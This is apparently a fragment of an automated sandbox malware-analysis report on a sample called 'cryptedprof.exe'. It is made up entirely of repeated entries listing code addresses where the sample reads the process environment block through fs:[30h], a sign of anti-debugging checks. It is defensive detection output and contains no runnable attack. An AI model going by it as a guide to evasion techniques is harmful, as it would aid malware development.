          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]3_2_00ABB1E1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B441E8 mov eax, dword ptr fs:[00000030h]3_2_00B441E8
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120 mov ecx, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]3_2_00AE513A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]3_2_00AE513A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]3_2_00AB9100
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]3_2_00AB9100
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]3_2_00AB9100
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC962 mov eax, dword ptr fs:[00000030h]3_2_00ABC962
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]3_2_00ABB171
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]3_2_00ABB171
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]3_2_00ADB944
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]3_2_00ADB944
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]3_2_00ACAAB0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]3_2_00ACAAB0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]3_2_00AEFAB0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]3_2_00AED294
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]3_2_00AED294
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]3_2_00AE2AE4
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2ACB mov eax, dword ptr fs:[00000030h]3_2_00AE2ACB
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]3_2_00AF4A2C
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]3_2_00AF4A2C
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]3_2_00ADA229
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]3_2_00ADA229
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]3_2_00ADA229
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]3_2_00ADA229
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]3_2_00ADA229
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]3_2_00ADA229
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]3_2_00ADA229
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]3_2_00ADA229
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]3_2_00ADA229
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]3_2_00B7AA16
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]3_2_00B7AA16
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC8A0A mov eax, dword ptr fs:[00000030h]3_2_00AC8A0A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD3A1C mov eax, dword ptr fs:[00000030h]3_2_00AD3A1C
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB5210 mov ecx, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]3_2_00ABAA16
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]3_2_00ABAA16
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF927A mov eax, dword ptr fs:[00000030h]3_2_00AF927A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]3_2_00B6B260
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]3_2_00B6B260
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88A62 mov eax, dword ptr fs:[00000030h]3_2_00B88A62
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7EA55 mov eax, dword ptr fs:[00000030h]3_2_00B7EA55
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B44257 mov eax, dword ptr fs:[00000030h]3_2_00B44257
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]3_2_00AE4BAD
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]3_2_00AE4BAD
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]3_2_00AE4BAD
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B85BA5 mov eax, dword ptr fs:[00000030h]3_2_00B85BA5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]3_2_00AC1B8F
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]3_2_00AC1B8F
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6D380 mov ecx, dword ptr fs:[00000030h]3_2_00B6D380
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2397 mov eax, dword ptr fs:[00000030h]3_2_00AE2397
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7138A mov eax, dword ptr fs:[00000030h]3_2_00B7138A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEB390 mov eax, dword ptr fs:[00000030h]3_2_00AEB390
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]3_2_00ADDBE9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E3 mov ecx, dword ptr fs:[00000030h]3_2_00B623E3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E3 mov ecx, dword ptr fs:[00000030h]3_2_00B623E3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E3 mov eax, dword ptr fs:[00000030h]3_2_00B623E3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]3_2_00B353CA
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]3_2_00B353CA
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]3_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7131B mov eax, dword ptr fs:[00000030h]3_2_00B7131B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]3_2_00ABDB60
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]3_2_00AE3B7A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]3_2_00AE3B7A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88B58 mov eax, dword ptr fs:[00000030h]3_2_00B88B58
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABDB40 mov eax, dword ptr fs:[00000030h]3_2_00ABDB40
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABF358 mov eax, dword ptr fs:[00000030h]3_2_00ABF358
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]3_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC849B mov eax, dword ptr fs:[00000030h]3_2_00AC849B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B714FB mov eax, dword ptr fs:[00000030h]3_2_00B714FB
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88CD6 mov eax, dword ptr fs:[00000030h]3_2_00B88CD6
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEBC2C mov eax, dword ptr fs:[00000030h]3_2_00AEBC2C
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD746D mov eax, dword ptr fs:[00000030h]3_2_00AD746D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]3_2_00AEAC7B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]3_2_00B4C450
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]3_2_00B4C450
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA44B mov eax, dword ptr fs:[00000030h]3_2_00AEA44B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE35A1 mov eax, dword ptr fs:[00000030h]3_2_00AE35A1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]3_2_00B805AC
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]3_2_00B805AC
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]3_2_00AEFD9B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]3_2_00AEFD9B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B68DF1 mov eax, dword ptr fs:[00000030h]3_2_00B68DF1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]3_2_00ACD5E0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]3_2_00ACD5E0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B3A537 mov eax, dword ptr fs:[00000030h]3_2_00B3A537
